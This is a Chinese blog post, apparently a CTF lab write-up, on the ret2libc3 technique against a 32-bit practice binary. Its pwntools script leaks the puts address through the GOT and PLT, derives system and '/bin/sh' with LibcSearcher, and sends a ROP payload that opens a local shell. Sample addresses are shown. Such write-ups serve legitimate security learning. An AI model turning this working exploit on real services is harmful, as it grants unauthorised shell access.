美文网首页
基本ROP实验3_ret2libc3

基本ROP实验3_ret2libc3

作者: 成成不吃萝卜 | 来源:发表于2019-03-22 20:48 被阅读0次

利用ret2libc3实验原理,用pwn的文件来尝试一下。

首先,拿到了一个pwn文件,用IDA女神看看源程序是什么样子的。

这里有read函数,看来可以靠栈的溢出来实现getshell。

这次相比实验二的难点在于不允许使用system函数,然后都需要自己找到。

system 函数属于 libc,而 libc.so 动态链接库中的函数之间相对偏移是固定的。

也就是说可以通过泄露出某个函数的地址,减去在libc中的相对偏移,就能得到libc的基址,利用system的相对偏移就可以找到system函数。这里利用了puts函数。

为了得到libc中函数的地址,我们用的是got表泄露。涉及到got表与plt表的关系,大家可以去这里看一下。

GOT表和PLT表知识详解 - qq_18661257的专栏 - CSDN博客

国际惯例,看一哈文件保护,果然没什么有效的保护。

接下来就是找system函数的地址,写个脚本,主要是为了实现与pwn文件交互。

from pwn import *   

from LibcSearcher import *   #库函数LibcSearcher

import pwnlib    #能够进行动态调试

这两句可以理解为搭调试的环境,方便动态调试。

context.log_level='debug'

context.terminal=['gnome-terminal','-x','sh','-c'] 

下面进行puts地址的泄露。

p=process('./pwn') #创建进程

elf=ELF('./pwn') #以ELF为格式创建对象

main=0x080484FD  #主函数地址

payload='a'*112+p32(elf.plt['puts'])+p32(main)+p32(elf.got['puts'])

pwnlib.gdb,attach(p)

p.recvuntil('try\n')

p.sendline(payload)

puts=u32(p.recv(4)) #解包,取前四个

print('puts',hex(puts))

我们是在文件第一次执行的时候泄露puts。payload的作用如下图所示,将read函数的返回值赋为puts.plt,main函数的地址又为puts函数的返回值,puts.got作为puts函数的参数,泄露puts函数的地址。

主函数的地址在IDA里可以看到,至于填充多少个字符,方法在实验二讲述过。

main = 0x080484FD

接下来就是利用泄露出来的地址找到system和字符串_bin_sh。

LIbcSearcher利用泄露的puts函数的地址找到libc的版本,libc.dump可以查出偏移量,进而找出libcbase,也就是库函数的基址,再加上system的偏移就可以得到它的地址。

libc =LibcSearcher('puts',puts)

libcbase=puts-libc.dump('puts')

system=libcbase+libc.dump('system')

bin_sh=libcbase+libc.dump('str_bin_sh')

print('system',hex(system))       #将system的地址打印出来

print('binsh',hex(bin_sh))        #将bin_sh打印

payload='a'*104+p32(system)+p32(0xdeadbeef)+p32(bin_sh)

p.sendline(payload)

p.interactive() #交互

在脚本终端可以看到打印的地址。

puts:0xf7df9140

system:   0xf7dd4940

binsh:  0xf7ef302b

输入ls,可以看到电脑中的文件,getshell,也可以看看我是谁,hh。

唉,实验做出来不容易,环境崩了以后调了好久,网上的方法都试过了,没有用(Tina噜,我的电脑和大家的不一样妈?!!!)。

最后将编译器重新装了一遍就好了......哭辽。

相关文章

  • 基本ROP实验3_ret2libc3

    利用ret2libc3实验原理,用pwn的文件来尝试一下。 首先,拿到了一个pwn文件,用IDA女神看看源程序是什...

  • 基本ROP讲解

    0x01 前言 在了解栈溢出后,我们再从原理和方法两方面深入理解基本ROP。 0x02 什么是ROP ROP的全称...

  • 总结

    栈溢出技巧 ROP 基本ROP ret2text ret2shellcode ret2syscall 32位 调用...

  • pwn栈溢出-基本ROP

    0. 前言 接触ctf一年有余,作为一名ctf老菜鸟,没写过一篇ctf相关博客,确实不该。 本文介绍pwn入门操作...

  • [JarvisOj](pwn)rop_rop_rop

    简介 : 利用代码 : 方法一 :(按照出题人的思路 , 分别调用 Step1, Step2, Step3, 在内...

  • ROP|frame faking|

    基础ROP *目前主要的是 ROP(Return Oriented Programming),其主要思想是在栈缓冲...

  • NX防护机制绕过 ROP

    什么是ROP *ROP(Return Oriented Programming)即面向返回地址编程,其主要思想是在...

  • rop and rop2 wp

    题目来源:国外的一个ctf平台hackme rop hint: ROP buffer overflow防护机制: ...

  • ROP

    很明显的栈溢出,想了半天没有头绪,然后发现可以用ROPgadget –binary rop –ropchain 直...

  • ROP

    ROP全称为Return-oriented Programming(面向返回的编程)是一种新型的基于代码复用技术的...

网友评论

      本文标题:基本ROP实验3_ret2libc3

      本文链接:https://www.haomeiwen.com/subject/xrwwmqtx.html